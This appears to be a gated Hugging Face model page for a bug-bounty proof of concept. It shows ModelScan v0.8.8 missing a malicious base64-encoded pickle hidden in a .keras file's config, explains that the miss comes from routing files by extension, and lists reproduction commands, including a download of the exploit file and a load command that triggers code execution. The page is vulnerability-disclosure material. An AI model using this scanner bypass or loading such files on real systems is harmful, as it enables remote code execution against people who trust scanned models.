You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

ModelScan v0.8.8 Scanner Bypass โ€” TorchModuleWrapper RCE PoC

PoC for Huntr Model Format Vulnerability bounty.

ModelScan v0.8.8 reports "No issues found" on this file despite it containing a malicious pickle that executes arbitrary code when loaded with safe_mode=False.

Reproduction

# 1. Download
wget https://huggingface.co/abdulb4s1t/modelscan-bypass-torch-rce-poc/resolve/main/exploit_final.keras

# 2. Install
pip install modelscan==0.8.8 keras torch

# 3. Scan -- reports clean
modelscan scan -p exploit_final.keras

# 4. Load -- triggers RCE during torch.load()
python -c "import keras; keras.saving.load_model('exploit_final.keras', safe_mode=False)"

Root Cause

ModelScan uses file extension as the sole scanner routing key:

  • .keras -> KerasLambdaDetectScan (checks only for class_name == "Lambda")
  • PickleUnsafeOpScan never runs on .keras files (wrong extension)
  • Base64-encoded pickle in config.json is invisible to all 7 scanner modules

Environment

  • ModelScan 0.8.8
  • Keras 3.14.1 (v3.15.0-dev HEAD 4725b68 also tested -- no relevant differences)
  • PyTorch 2.12.0+cpu
  • Python 3.12.3
  • Ubuntu 24.04 aarch64

Notes

  • Requires safe_mode=False (non-default user opt-in)
  • Gated access enabled -- request access or contact me
Downloads last month
40
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support